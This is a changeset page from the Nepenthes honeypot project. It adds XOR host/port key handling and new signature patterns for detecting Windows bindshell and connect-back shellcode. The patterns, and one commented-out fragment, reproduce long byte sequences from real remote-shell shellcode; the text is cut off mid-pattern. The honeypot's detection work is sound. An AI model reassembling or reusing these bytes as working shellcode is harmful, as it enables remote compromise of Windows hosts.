Navigation

← Previous Changeset
Next Changeset →

Changeset 430

Timestamp:

03/26/06 19:27:00 (3 years ago)

Author:

common

Message:

shellcode-signatures
added connectbackshell::hod_lsass
added connectbackshell::zuc_winshit
added connectbackshell::hatsquad_wins
added connectbackshell::hod_netdde
added connectbackshell::mandragore
added bindshell::hod_netdde
added bindshell::mandragore
added bindshell::hatsquad_wins
added xor::hod

additionally mapping got extended with hostkey and portkey for connectbackshells

Files:

nepenthes/trunk/modules/shellcode-signatures/parser.h (modified) (1 diff)
nepenthes/trunk/modules/shellcode-signatures/parser.l (modified) (1 diff)
nepenthes/trunk/modules/shellcode-signatures/parser.y (modified) (3 diffs)
nepenthes/trunk/modules/shellcode-signatures/sch_namespace_bindshell.cpp (modified) (2 diffs)
nepenthes/trunk/modules/shellcode-signatures/sch_namespace_connectbackshell.cpp (modified) (3 diffs)
nepenthes/trunk/modules/shellcode-signatures/sch_namespace_xor.cpp (modified) (2 diffs)
nepenthes/trunk/modules/shellcode-signatures/shellcode-signatures.sc (modified) (5 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

nepenthes/trunk/modules/shellcode-signatures/parser.h

r428	r430
31	31	sc_pre,
32	32	sc_post,
33		sc_none
	33	sc_none,
	34	sc_hostkey,
	35	sc_portkey
	36
34	37	};
35	38

nepenthes/trunk/modules/shellcode-signatures/parser.l

r428	r430
54	54	"connectbacklinkfiletransfer" { return SC_CONNECTBACK_LINK_FILETRANSFER; }
55	55	"bindlinkfiletransfer" { return SC_BIND_LINK_FILETRANSFER; }
	56
	57	"hostkey" { return SC_HOSTKEY; }
	58	"portkey" { return SC_PORTKEY; }
56	59
57	60	"key" { return SC_KEY; }

nepenthes/trunk/modules/shellcode-signatures/parser.y

r428	r430
37	37	SC_URI
38	38	SC_PCRE SC_PRELOAD SC_POSTLOAD
	39	SC_HOSTKEY SC_PORTKEY
39	40
40	41	%start body
…	…
221	222	{
222	223	shellcodes->map[shellcodes->map_items++] = sc_none;
	224	}
	225	\| SC_HOSTKEY
	226	{
	227	shellcodes->map[shellcodes->map_items++] = sc_hostkey;
	228	}
	229	\| SC_PORTKEY
	230	{
	231	shellcodes->map[shellcodes->map_items++] = sc_portkey;
223	232	}
224	233
…	…
293	302	"pre",
294	303	"post",
295		"none"
	304	"none",
	305	"hostkey",
	306	"portkey"
296	307	};
297	308	if ( num > sizeof(mapmapping)/sizeof(char *) )

nepenthes/trunk/modules/shellcode-signatures/sch_namespace_bindshell.cpp

r428	r430
92	92	sch_result NamespaceBindShell::handleShellcode(Message **msg)
93	93	{
94		logSpam("%s checking ~~...\n",m_ShellcodeHandlerName.c_str~~());
	94	logSpam("%s checking %i...\n",m_ShellcodeHandlerName.c_str(), (*msg)->getSize());
95	95
96	96	char shellcode = (msg)->getMsg();
…	…
101	101
102	102
103		if (~~(matchCount = pcre_exec(m_Pcre, 0, (char ) shellcode, len, 0, 0, (int )ovec, sizeof(ovec)/sizeof(int32_t))) > 0~~)
104		{
	103	if ( (matchCount = pcre_exec(m_Pcre, 0, (char ) shellcode, len, 0, 0, (int )ovec, sizeof(ovec)/sizeof(int32_t))) > 0 )
	104	{
105	105	const char * match;
106	106
107	107	// the bind port
108	108	// const char *portMatch;
109		uint16_t port;
	109	uint16_t port=0;
110	110
111		pcre_get_substring((char ) shellcode, (int )ovec, (int)matchCount, 1, &match);
112		port = ntohs((uint16_t ) match);
113		pcre_free_substring(match);
	111	for ( int i=0; i < m_Shellcode->map_items; i++ )
	112	{
	113	if ( m_Shellcode->map[i] == sc_port )
	114	{
	115	pcre_get_substring((char ) shellcode, (int )ovec, (int)matchCount, 1, &match);
	116	port = ntohs((uint16_t ) match);
	117	pcre_free_substring(match);
	118	}
	119	}
114	120
115		logInfo("%s :%u \n",m_ShellcodeHandlerName.c_str(), port);
	121	logInfo("%s :%u \n",m_ShellcodeHandlerName.c_str(), port);
116	122
117		Socket *socket;
118		~~if ((socket = g_Nepenthes->getSocketMgr()->bindTCPSocket(0,port,60,30)) == NULL~~)
119		{
120		logCrit("%s","Could not bind socket %u \n",port);
121		return SCH_DONE;
122		}
	123	Socket *socket;
	124	if ( (socket = g_Nepenthes->getSocketMgr()->bindTCPSocket(0,port,60,30)) == NULL )
	125	{
	126	logCrit("%s","Could not bind socket %u \n",port);
	127	return SCH_DONE;
	128	}
123	129
124		DialogueFactory *diaf;
125		~~if ((diaf = g_Nepenthes->getFactoryMgr()->getFactory("WinNTShell DialogueFactory")) == NULL~~)
126		{
127		logCrit("%s","No WinNTShell DialogueFactory availible \n");
128		return SCH_DONE;
129		}
	130	DialogueFactory *diaf;
	131	if ( (diaf = g_Nepenthes->getFactoryMgr()->getFactory("WinNTShell DialogueFactory")) == NULL )
	132	{
	133	logCrit("%s","No WinNTShell DialogueFactory availible \n");
	134	return SCH_DONE;
	135	}
130	136
131		socket->addDialogueFactory(diaf);
132		return SCH_DONE;
	137	socket->addDialogueFactory(diaf);
	138	return SCH_DONE;
133	139	}
134	140

nepenthes/trunk/modules/shellcode-signatures/sch_namespace_connectbackshell.cpp

r428	r430
111	111
112	112
	113	const char *hkeyMatch = NULL;
	114	uint32_t hostKey = 0;
	115
	116	// port
	117	const char *pkeyMatch = NULL;
	118	uint16_t portKey = 0;
	119
113	120
114	121	if ( (matchCount = pcre_exec(m_Pcre, 0, (char ) shellcode, len, 0, 0, (int )ovec, sizeof(ovec)/sizeof(int32_t))) > 0 )
…	…
135	142	break;
136	143
	144	case sc_hostkey:
	145	hkeyMatch = match;
	146	break;
	147
	148	case sc_portkey:
	149	pkeyMatch = match;
	150	break;
	151
137	152	case sc_port:
138	153	portMatch = match;
…	…
151	166	host = (uint32_t)((uint32_t )hostMatch);
152	167
153
	168	if (hkeyMatch != NULL)
	169	{
	170	hostKey = ((uint32_t )hkeyMatch);
	171	host = host ^ hostKey;
	172	pcre_free_substring(hkeyMatch);
	173	}
	174
	175	if (pkeyMatch != NULL)
	176	{
	177	portKey = ((uint16_t )pkeyMatch);
	178	port = port ^ portKey;
	179	pcre_free_substring(pkeyMatch);
	180	}
	181
	182
	183
154	184	pcre_free_substring(hostMatch);
155	185	pcre_free_substring(portMatch);

nepenthes/trunk/modules/shellcode-signatures/sch_namespace_xor.cpp

r429	r430
86	86	sch_result NamespaceXOR::handleShellcode(Message **msg)
87	87	{
88		logSpam("%s checking ~~...\n",m_ShellcodeHandlerName.c_str~~());
	88	logSpam("%s checking %i...\n",m_ShellcodeHandlerName.c_str(), (*msg)->getSize());
89	89
90	90	char shellcode = (msg)->getMsg();
…	…
240	240	logWarn("codeSize4 (%i) > postSize (%i), maybe broken xor?\n",codeSize4,postSize);
241	241
242		for ( uint32_t j = 0; j < codeSize && (j+1)*4 < postSize; j++ )
	242	for ( uint32_t j = 0; j < codeSize && (j)*4 < postSize; j++ )
243	243	(uint32_t )(decodedMessage+(j*4) ) ^= intKey;
244	244	break;

nepenthes/trunk/modules/shellcode-signatures/shellcode-signatures.sc

r429	r430
3	3	/*
4	4	=--- ShellcodeManager ---=
5		[x] 0) GenericXOR generic XOR decoder
6		[x] 1) GenericCreateProcess generic CreateProcess decoder
7		[x] 2) GenericUrl generic Url decoder
8		[x] 3) LinkXOR link-bot XOR decoder
9		[x] 4) GenericCMD generic CMD decoder
10		[x] 5) LinkTrans handles linkbot/linkshellcode connectback transfers
11		[x] 6) LinkBindTrans handles linkbot/linkshellcode bind transfers
12		[x] 7) Stuttgart handles "stuttgart" shellcode
13		[ ] 8) Wuerzburg handles "wuerzburg" shellcode
14		[x] 9) GenericBind various bindshells
15		[x] 10) GenericConnect various bindshells
16		[x] 11) KonstanzXOR Konstanz XOR decoder
17		[x] 12) GenericConnectTrans various csends
18		[ ] 13) GenericUniCode generic UniCode decoder
19		[x] 14) GenericWinExec generic WinExec decoder
20		[x] 15) LeimbachUrlXOR generic XOR decoder
21		[x] 16) Genericwget generic wget decoder
22		[ ] 17) ASN1IISBase64 handles oc192 dcom bindshell
23		[ ] 18) ASN1SMBBind handles oc192 dcom bindshell
24		[ ] 19) THCConnect handles thc iis connectbackshells
25		[ ] 20) THCBind handles thc iis bindshells
26		[ ] 21) HODBind handles oc192 dcom bindshell
27		[ ] 22) HODConnect handles oc192 dcom bindshell
28		[ ] 23) HODBind handles house of dabus msmq bindshells
29		[ ] 24) HODBind handles house of dabus netdde bindshells
30		[ ] 25) HODConnect handles house of dabus netdde bindshells
31		[ ] 26) MandragoreBind mandragore sasserftpd bondshells
32		[ ] 27) MandragoreConnect mandragore sasserftpd bondshells
33		[ ] 28) HATSQUADConnect handles hat-squad wins connect
34		[ ] 29) HATSQUADBind handles hat-squad wins bindshell
35		[ ] 30) ZUCConnect handles zuc wins connect
	5	[n] [+] 0) GenericXOR generic XOR decoder
	6	[n] [+] 1) GenericCreateProcess generic CreateProcess decoder
	7	[n] [+] 2) GenericUrl generic Url decoder
	8	[+] [ ] 3) LinkXOR link-bot XOR decoder
	9	[n] [+] 4) GenericCMD generic CMD decoder
	10	[+] [ ] 5) LinkTrans handles linkbot/linkshellcode connectback transfers
	11	[+] [ ] 6) LinkBindTrans handles linkbot/linkshellcode bind transfers
	12	[+] [ ] 7) Stuttgart handles "stuttgart" shellcode
	13	[s] [ ] 8) Wuerzburg handles "wuerzburg" shellcode
	14	[n] [+] 9) GenericBind various bindshells
	15	[n] [+] 10) GenericConnect various bindshells
	16	[n] [ ] 11) KonstanzXOR Konstanz XOR decoder
	17	[n] [ ] 12) GenericConnectTrans various csends
	18	[?] [ ] 13) GenericUniCode generic UniCode decoder
	19	[n] [+] 14) GenericWinExec generic WinExec decoder
	20	[n] [ ] 15) LeimbachUrlXOR generic XOR decoder
	21	[?] [ ] 16) Genericwget generic wget decoder
	22	[?] [ ] 17) ASN1IISBase64 handles oc192 dcom bindshell
	23	[a] [ ] 18) ASN1SMBBind handles oc192 dcom bindshell
	24	[s] [ ] 19) THCConnect handles thc iis connectbackshells
	25	[a] [ ] 20) THCBind handles thc iis bindshells
	26	[s] [ ] 21) HODBind handles oc192 dcom bindshell
	27	[s] [ ] 22) HODConnect handles oc192 dcom bindshell
	28	[s] [ ] 23) HODBind handles house of dabus msmq bindshells
	29	[a] [ ] 24) HODBind handles house of dabus netdde bindshells
	30	[a] [ ] 25) HODConnect handles house of dabus netdde bindshells
	31	[s] [ ] 26) MandragoreBind mandragore sasserftpd bondshells
	32	[s] [ ] 27) MandragoreConnect mandragore sasserftpd bondshells
	33	[n] [+] 28) HATSQUADConnect handles hat-squad wins connect
	34	[n] [+] 29) HATSQUADBind handles hat-squad wins bindshell
	35	[s] [ ] 30) ZUCConnect handles zuc wins connect
36	36	=--- 31 ShellcodeHandlers registerd
37	37	*/
…	…
184	184	mapping (none,pre,pcre,size,key,post);
185	185	};
	186
	187
	188	xor::hod
	189	{
	190	pattern
	191	"(.)(\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9(..)\\x80\\x34\\x0B(.)\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF)(.)$";
	192
	193	mapping (none,pre,pcre,size,key,post);
	194	};
	195
	196
	197
	198
	199
186	200
187	201
…	…
392	406	};
393	407
394
395
396
	408	bindshell::hatsquad_wins
	409	{
	410	pattern
	411	"\\xFC\\x6A\\xEB\\x4F\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x7C\\x05"
	412	"\\x78\\x01\\xEF\\x8B\\x4F\\x18\\x8B\\x5F\\x20\\x01\\xEB\\xE3\\x30\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31"
	413	"\\xC0\\x99\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE3"
	414	"\\x8B\\x5F\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1C\\x01\\xEB\\x03\\x2C\\x8B\\x89\\x6C\\x24"
	415	"\\x1C\\x61\\xC3\\x31\\xC0\\x64\\x8B\\x40\\x30\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E"
	416	"\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x31\\xDB\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32"
	417	"\\x5F\\x54\\xFF\\xD0\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02"
	418	"\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53\\x53\\x43\\x53"
	419	"\\x43\\x53\\xFF\\xD0\\x66\\x68(..)\\x66\\x53\\x89\\xE1\\x95\\x68\\xA4\\x1A\\x70\\xC7\\x57\\xFF"
	420	"\\xD6\\x6A\\x10\\x51\\x55\\xFF\\xD0\\x68\\xA4\\xAD\\x2E\\xE9\\x57\\xFF\\xD6\\x53\\x55\\xFF\\xD0\\x68"
	421	"\\xE5\\x49\\x86\\x49\\x57\\xFF\\xD6\\x50\\x54\\x54\\x55\\xFF\\xD0\\x93\\x68\\xE7\\x79\\xC6\\x79\\x57"
	422	"\\xFF\\xD6\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x89\\xE5\\x6A\\x50\\x59\\x29\\xCC\\x89";
	423	/*
	424	actually the shellcode used here is crippled, the exit fn is missing :\
	425	"\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\xFE\\x42\\x2D\\xFE\\x42\\x2C\\x93\\x8D\\x7A\\x38\\xAB"
	426	"\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x44\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01"
	427	"\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0"
	428	"\\x8B\\x57\\xFC\\x83\\xC4\\x64\\xFF\\xD6\\x52\\xFF\\xD0\\x68\\xEF\\xCE\\xE0\\x60\\x53\\xFF\\xD6\\xFF"
	429	"\\xD0";
	430	*/
	431	mapping (none,port);
	432	};
	433
	434
	435
	436	bindshell::mandragore
	437	{
	438	pattern
	439	"\\x64\\x67\\x8F\\x06\\x00\\x00\\xBE..."
	440	".\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x15.."
	441	"..\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52\\xE8\\x0B\\x00\\x00"
	442	"\\x00\\x57\\x53\\x41\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00\\x57\\xFF\\x16\\xFF"
	443	"\\xD0\\x93\\x6A\\x00\\x68\\x02\\x00(..)\\x8B\\xC4\\x6A\\x10\\x50\\x53\\xE8"
	444	"\\x05\\x00\\x00\\x00\\x62\\x69\\x6E\\x64\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x6A\\x01"
	445	"\\x53\\xE8\\x07\\x00\\x00\\x00\\x6C\\x69\\x73\\x74\\x65\\x6E\\x00\\x57\\xFF\\x16"
	446	"\\xFF\\xD0\\x6A\\x00\\x54\\x53\\xE8\\x07\\x00\\x00\\x00\\x61\\x63\\x63\\x65\\x70"
	447	"\\x74\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x6A\\x10\\x59\\x8B\\xFC"
	448	"\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B\\x3C\\x24\\x50\\x50\\x50\\x6A\\x01\\x50\\x50"
	449	"\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D\\x64\\x00\\x50\\xE8\\x0F\\x00\\x00\\x00\\x43"
	450	"\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x41\\x00\\xC6\\x07"
	451	"\\x44\\xC7\\x47\\x2C\\x01\\x01\\x00\\x00\\x83\\xC7\\x38\\x93\\xAB\\xAB\\xAB\\x64"
	452	"\\x67\\xA1\\x30\\x00\\x8B\\x40\\x0C\\x8B\\x40\\x1C\\x8B\\x00\\xFF\\x70\\x08\\xFF"
	453	"\\x16\\xFF\\xD0";
	454
	455	mapping (none,port);
	456	};
	457
	458	bindshell::hod_netdde
	459	{
	460	pattern
	461	"\\xEB\\x70\\x56\\x33\\xC0\\x64\\x8B\\x40\\x30\\x85\\xC0\\x78\\x0C\\x8B\\x40\\x0C"
	462	"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C\\x8B"
	463	"\\x40\\x3C\\x5E\\xC3\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x54\\x05\\x78"
	464	"\\x03\\xD5\\x8B\\x4A\\x18\\x8B\\x5A\\x20\\x03\\xDD\\xE3\\x34\\x49\\x8B\\x34\\x8B"
	465	"\\x03\\xF5\\x33\\xFF\\x33\\xC0\\xFC\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCF\\x0D\\x03"
	466	"\\xF8\\xEB\\xF4\\x3B\\x7C\\x24\\x28\\x75\\xE1\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B"
	467	"\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\x89\\x44\\x24\\x1C"
	468	"\\x61\\xC3\\xEB\\x3D\\xAD\\x50\\x52\\xE8\\xA8\\xFF\\xFF\\xFF\\x89\\x07\\x83\\xC4"
	469	"\\x08\\x83\\xC7\\x04\\x3B\\xF1\\x75\\xEC\\xC3\\x8E\\x4E\\x0E\\xEC\\x72\\xFE\\xB3"
	470	"\\x16\\x7E\\xD8\\xE2\\x73\\xAD\\xD9\\x05\\xCE\\xD9\\x09\\xF5\\xAD\\xA4\\x1A\\x70"
	471	"\\xC7\\xA4\\xAD\\x2E\\xE9\\xE5\\x49\\x86\\x49\\xCB\\xED\\xFC\\x3B\\xE7\\x79\\xC6"
	472	"\\x79\\x83\\xEC\\x60\\x8B\\xEC\\xEB\\x02\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5E"
	473	"\\xE8\\x3D\\xFF\\xFF\\xFF\\x8B\\xD0\\x83\\xEE\\x36\\x8D\\x7D\\x04\\x8B\\xCE\\x83"
	474	"\\xC1\\x10\\xE8\\x9D\\xFF\\xFF\\xFF\\x83\\xC1\\x18\\x33\\xC0\\x66\\xB8\\x33\\x32"
	475	"\\x50\\x68\\x77\\x73\\x32\\x5F\\x8B\\xDC\\x51\\x52\\x53\\xFF\\x55\\x04\\x5A\\x59"
	476	"\\x8B\\xD0\\xE8\\x7D\\xFF\\xFF\\xFF\\xB8\\x01\\x63\\x6D\\x64\\xC1\\xF8\\x08\\x50"
	477	"\\x89\\x65\\x34\\x33\\xC0\\x66\\xB8\\x90\\x01\\x2B\\xE0\\x54\\x83\\xC0\\x72\\x50"
	478	"\\xFF\\x55\\x24\\x33\\xC0\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF\\x55\\x14"
	479	"\\x8B\\xF0\\x33\\xC0\\x33\\xDB\\x50\\x50\\x50\\xB8\\x02\\x01(..)\\xFE\\xCC"
	480	"\\x50\\x8B\\xC4\\xB3\\x10\\x53\\x50\\x56\\xFF\\x55\\x18\\x53\\x56\\xFF\\x55\\x1C"
	481	"\\x53\\x8B\\xD4\\x2B\\xE3\\x8B\\xCC\\x52\\x51\\x56\\xFF\\x55\\x20\\x8B\\xF0\\x33"
	482	"\\xC9\\xB1\\x54\\x2B\\xE1\\x8B\\xFC\\x57\\x33\\xC0\\xF3\\xAA\\x5F\\xC6\\x07\\x44"
	483	"\\xFE\\x47\\x2D\\x57\\x8B\\xC6\\x8D\\x7F\\x38\\xAB\\xAB\\xAB\\x5F\\x33\\xC0\\x8D"
	484	"\\x77\\x44\\x56\\x57\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50\\xFF\\x75\\x34\\x50"
	485	"\\xFF\\x55\\x08\\xF7\\xD0\\x50\\xFF\\x36\\xFF\\x55\\x10\\xFF\\x77\\x38\\xFF\\x55"
	486	"\\x28\\xFF\\x55";
	487	mapping (none,port);
	488	};
	489
	490
	491	connectbackshell::mandragore
	492	{
	493	pattern
	494	"\\x64\\x67\\x8F\\x06\\x00\\x00\\xBE..."
	495	".\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\x15.."
	496	"..\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52\\xE8\\x0B\\x00\\x00"
	497	"\\x00\\x57\\x53\\x41\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00\\x57\\xFF\\x16\\xFF"
	498	"\\xD0\\x93\\x68(....)\\x68\\x02\\x00(..)\\x8B\\xC4\\x6A\\x10"
	499	"\\x50\\x53\\xE8\\x08\\x00\\x00\\x00\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x00\\x57"
	500	"\\xFF\\x16\\xFF\\xD0\\x6A\\x10\\x59\\x8B\\xFC\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B"
	501	"\\x3C\\x24\\x50\\x50\\x50\\x6A\\x01\\x50\\x50\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D"
	502	"\\x64\\x00\\x50\\xE8\\x0F\\x00\\x00\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72"
	503	"\\x6F\\x63\\x65\\x73\\x73\\x41\\x00\\xC6\\x07\\x44\\xC7\\x47\\x2C\\x01\\x01\\x00"
	504	"\\x00\\x83\\xC7\\x38\\x93\\xAB\\xAB\\xAB\\x64\\x67\\xA1\\x30\\x00\\x8B\\x40\\x0C"
	505	"\\x8B\\x40\\x1C\\x8B\\x00\\xFF\\x70\\x08\\xFF\\x16\\xFF\\xD0";
	506	mapping (none,host,port);
	507	};
	508
	509
	510	connectbackshell::hod_netdde
	511	{
	512	pattern
	513	"\\xEB\\x70\\x56\\x33\\xC0\\x64\\x8B\\x40\\x30\\x85\\xC0\\x78\\x0C\\x8B\\x40\\x0C"
	514	"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C\\x8B"
	515	"\\x40\\x3C\\x5E\\xC3\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x54\\x05\\x78"
	516	"\\x03\\xD5\\x8B\\x4A\\x18\\x8B\\x5A\\x20\\x03\\xDD\\xE3\\x34\\x49\\x8B\\x34\\x8B"
	517	"\\x03\\xF5\\x33\\xFF\\x33\\xC0\\xFC\\xAC\\x84\\xC0\\x74\\x07\\xC1\\xCF\\x0D\\x03"
	518	"\\xF8\\xEB\\xF4\\x3B\\x7C\\x24\\x28\\x75\\xE1\\x8B\\x5A\\x24\\x03\\xDD\\x66\\x8B"
	519	"\\x0C\\x4B\\x8B\\x5A\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\x89\\x44\\x24\\x1C"
	520	"\\x61\\xC3\\xEB\\x35\\xAD\\x50\\x52\\xE8\\xA8\\xFF\\xFF\\xFF\\x89\\x07\\x83\\xC4"
	521	"\\x08\\x83\\xC7\\x04\\x3B\\xF1\\x75\\xEC\\xC3\\x8E\\x4E\\x0E\\xEC\\x72\\xFE\\xB3"
	522	"\\x16\\x7E\\xD8\\xE2\\x73\\xAD\\xD9\\x05\\xCE\\xD9\\x09\\xF5\\xAD\\xEC\\xF9\\xAA"
	523	"\\x60\\xCB\\xED\\xFC\\x3B\\xE7\\x79\\xC6\\x79\\x83\\xEC\\x60\\x8B\\xEC\\xEB\\x02"
	524	"\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5E\\xE8\\x45\\xFF\\xFF\\xFF\\x8B\\xD0\\x83"
	525	"\\xEE\\x2E\\x8D\\x7D\\x04\\x8B\\xCE\\x83\\xC1\\x10\\xE8\\xA5\\xFF\\xFF\\xFF\\x83"
	526	"\\xC1\\x10\\x33\\xC0\\x66\\xB8\\x33\\x32\\x50\\x68\\x77\\x73\\x32\\x5F\\x8B\\xDC"
	527	"\\x51\\x52\\x53\\xFF\\x55\\x04\\x5A\\x59\\x8B\\xD0\\xE8\\x85\\xFF\\xFF\\xFF\\xB8"
	528	"\\x01\\x63\\x6D\\x64\\xC1\\xF8\\x08\\x50\\x89\\x65\\x30\\x33\\xC0\\x66\\xB8\\x90"
	529	"\\x01\\x2B\\xE0\\x54\\x83\\xC0\\x72\\x50\\xFF\\x55\\x1C\\x33\\xC0\\x50\\x50\\x50"
	530	"\\x50\\x40\\x50\\x40\\x50\\xFF\\x55\\x14\\x8B\\xF0\\x68(....)\\xB8"
	531	"\\x02\\x01(..)\\xFE\\xCC\\x50\\x8B\\xDC\\x33\\xC0\\xB0\\x10\\x50\\x53\\x56"
	532	"\\xFF\\x55\\x18\\x33\\xC9\\xB1\\x54\\x2B\\xE1\\x8B\\xFC\\x57\\x33\\xC0\\xF3\\xAA"
	533	"\\x5F\\xC6\\x07\\x44\\xFE\\x47\\x2D\\x57\\x8B\\xC6\\x8D\\x7F\\x38\\xAB\\xAB\\xAB"
	534	"\\x5F\\x33\\xC0\\x8D\\x77\\x44\\x56\\x57\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50"
	535	"\\xFF\\x75\\x30\\x50\\xFF\\x55\\x08\\xF7\\xD0\\x50\\xFF\\x36\\xFF\\x55\\x10\\xFF"
	536	"\\x77\\x38\\xFF\\x55\\x20\\xFF\\x55";
	537	mapping (none,host,port);
	538	};
397	539
398	540
…	…
508	650
509	651
	652	connectbackshell::hatsquad_wins
	653	{
	654	pattern
	655	"\\xFC\\x6A\\xEB\\x52\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\\x45"
	656	"\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x83\\xC7\\x01\\x8B\\x4F\\x17\\x8B\\x5F\\x1F"
	657	"\\x01\\xEB\\xE3\\x30\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\\xC0"
	658	"\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE3\\x8B"
	659	"\\x5F\\x23\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1B\\x01\\xEB\\x03\\x2C\\x8B"
	660	"\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xC0\\x64\\x8B\\x40\\x30\\x8B\\x40\\x0C\\x8B"
	661	"\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\\x31"
	662	"\\xDB\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\\x68"
	663	"\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\\x55"
	664	"\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\\x53"
	665	"\\x43\\x53\\x43\\x53\\xFF\\xD0\\x68(....)\\x66\\x68(..)\\x66"
	666	"\\x53\\x89\\xE1\\x95\\x68\\xEC\\xF9\\xAA\\x60\\x57\\xFF\\xD6\\x6A\\x10\\x51\\x55"
	667	"\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x6A\\x50\\x59\\x29\\xCC\\x89\\xE7"
	668	"\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\x95\\x89\\xFD\\xFE\\x42\\x2D\\xFE\\x42"
	669	"\\x2C\\x8D\\x7A\\x38\\xAB\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x28\\xFF"
	670	"\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\\x68"
	671	"\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x68\\xE7\\x79"
	672	"\\xC6\\x79\\xFF\\x75\\x04\\xFF\\xD6\\xFF\\x77\\xFC\\xFF\\xD0\\x68\\xEF\\xCE\\xE0"
	673	"\\x60\\x53\\xFF\\xD6\\xFF\\xD0";
	674	mapping (host,port);
	675	};
	676
	677
	678	connectbackshell::zuc_winshit
	679	{
	680	pattern
	681	"\\xEB\\x25(..)(....)\\x02\\x06\\x6C\\x59\\x6C\\x59\\xF8\\x1D"
	682	"\\x9C\\xDE\\x8C\\xD1\\x4C\\x70\\xD4\\x03\\x58\\x46\\x57\\x53\\x32\\x5F\\x33\\x32"
	683	"\\x2E\\x44\\x4C\\x4C\\x01\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5D\\x83\\xED\\x2C"
	684	"\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x78\\x08"
